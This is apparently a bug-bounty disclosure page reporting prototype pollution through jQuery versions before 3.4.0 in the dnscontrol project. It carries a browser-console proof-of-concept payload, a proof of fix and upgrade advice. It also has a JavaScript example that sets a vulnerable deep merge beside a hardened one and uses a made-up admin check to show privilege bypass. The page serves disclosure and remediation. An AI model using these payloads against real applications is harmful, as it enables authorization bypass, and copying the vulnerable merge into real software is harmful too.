stackexchange uses an unpatched version of jQuery < 3.4.0 which exposes it to prototype pollution in stackexchange/dnscontrol

Status: Valid

Reported on: Jul 12th 2022


Description

By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or to replace critical attributes with malicious ones. In jQuery before 3.4.0, jQuery.extend(true, ...) performs a deep merge without skipping the "__proto__" key, so a crafted object (for example one produced by JSON.parse from attacker-controlled input) that is deep-merged into any target writes straight into Object.prototype.

This can be problematic if the software depends on the existence or non-existence of certain attributes, or uses pre-defined attributes of the object prototype (such as hasOwnProperty, toString or valueOf).

Impact

  • Integrity: An attacker can inject attributes that are then read by other components (for example a flag that a check treats as "not set" when absent).
  • Availability: An attacker can override existing attributes with ones of an incompatible type (for example replacing toString with a non-function), which may lead to a crash.

Occurrences

Proof of Concept

On a page that loads the affected jQuery (any version before 3.4.0), open your browser console and paste the following code:

$.extend(true, {}, JSON.parse('{ "__proto__": { "polluted": true } }'))
console.log({}.polluted)
// returns true

Mitigation

Upgrade jQuery to 3.4.0 or later, where jQuery.extend skips the "__proto__" key (the upstream fix for CVE-2019-11358). If upgrading is not immediately possible, a backport patch for older versions can be found at the following link:

https://github.com/DanielRuf/snyk-js-jquery-174006

Proof of Fix

After updating or patching jQuery, the same commands should log undefined, because the "__proto__" key is no longer followed during the merge:

$.extend(true, {}, JSON.parse('{ "__proto__": { "polluted": true } }'))
console.log({}.polluted)
// returns undefined
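
The mechanism shown in the Proof of Concept and the check used in the Proof of Fix, as an added example in plain JavaScript that runs in Node without jQuery. This is not jQuery's own source and not code from the dnscontrol project: deepExtendVulnerable is a minimal merge in the style of jQuery.extend(true, ...) before 3.4.0, deepExtendSafe is a hardened variant, and isAdmin and runPayload are hypothetical names for a constructed consumer that shows the integrity impact listed above.

```javascript
// Added example, not jQuery's or dnscontrol's code: a minimal deep merge in the
// style of jQuery.extend(true, target, source) before 3.4.0, next to a hardened
// variant, and a constructed authorization gate that shows the integrity impact.

// Vulnerable: recurses into every enumerable key of `source`, including an own
// property literally named "__proto__" (which JSON.parse creates as a plain key).
// Reading target["__proto__"] yields Object.prototype, so the recursion writes
// straight into it.
function deepExtendVulnerable(target, source) {
  for (const name in source) {
    const copy = source[name];
    if (copy !== null && typeof copy === "object" && !Array.isArray(copy)) {
      const existing = target[name];
      const clone = existing !== null && typeof existing === "object" ? existing : {};
      target[name] = deepExtendVulnerable(clone, copy);
    } else if (copy !== undefined) {
      target[name] = copy;
    }
  }
  return target;
}

// Hardened: skip the keys that reach the prototype chain (jQuery 3.4.0 added the
// "__proto__" check; "constructor" and "prototype" are skipped here as well,
// which goes slightly beyond the upstream fix) and only merge own properties.
const UNSAFE_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function deepExtendSafe(target, source) {
  for (const name of Object.keys(source)) {
    if (UNSAFE_KEYS.has(name)) continue;
    const copy = source[name];
    if (copy !== null && typeof copy === "object" && !Array.isArray(copy)) {
      const existing = Object.prototype.hasOwnProperty.call(target, name) ? target[name] : undefined;
      const clone = existing !== null && typeof existing === "object" ? existing : {};
      target[name] = deepExtendSafe(clone, copy);
    } else if (copy !== undefined) {
      target[name] = copy;
    }
  }
  return target;
}

// Constructed consumer code: a gate that treats a missing flag as "not admin".
// With a polluted prototype, every object, including a fresh guest record, passes.
function isAdmin(user) {
  return user.isAdmin === true;
}

// Runs a payload shaped like the report's PoC through the given merge and reports
// what leaked. Object.prototype is restored afterwards so the rest of the process
// is unaffected.
function runPayload(merge) {
  const payload = JSON.parse('{ "__proto__": { "polluted": true, "isAdmin": true } }');
  merge({}, payload);
  const result = {
    polluted: ({}).polluted,                  // the report's own check
    guestIsAdmin: isAdmin({ name: "guest" }), // integrity impact on a consumer
  };
  delete Object.prototype.polluted;
  delete Object.prototype.isAdmin;
  return result;
}

console.log("jQuery < 3.4.0 style:", runPayload(deepExtendVulnerable)); // { polluted: true, guestIsAdmin: true }
console.log("hardened:", runPayload(deepExtendSafe));                  // { polluted: undefined, guestIsAdmin: false }
```

The hardened merge also iterates with Object.keys instead of for...in, so properties an earlier pollution may have placed on the prototype chain are never copied forward into new targets.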
Timeline

We are processing your report and will contact the stackexchange/dnscontrol team within 24 hours. (10 months ago)
We created a GitHub Issue asking the maintainers to create a SECURITY.md. (10 months ago)
Timothee Desurmont modified the report. (10 months ago)

Jamie Slome (Admin), 10 months ago:

Hi Timothee, it looks like you tried to edit the report on 12th July @ 1 PM UTC. This process failed, and so I have re-run this for you just now :)

We have contacted a member of the stackexchange/dnscontrol team and are waiting to hear back. (10 months ago)
We have sent a follow up to the stackexchange/dnscontrol team. We will try again in 7 days. (10 months ago)
We have sent a second follow up to the stackexchange/dnscontrol team. We will try again in 10 days. (10 months ago)
stackexchange/dnscontrol maintainer modified the Severity from Critical to Low. (10 months ago)
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
stackexchange/dnscontrol maintainer validated this vulnerability. (10 months ago)
Timothee Desurmont has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
The researcher's credibility has increased: +7
stackexchange/dnscontrol maintainer marked this as fixed in v3.18.0 with commit 9f5c35. (10 months ago)
The fix bounty has been dropped.
This vulnerability will not receive a CVE.
default.html#L10 has been validated.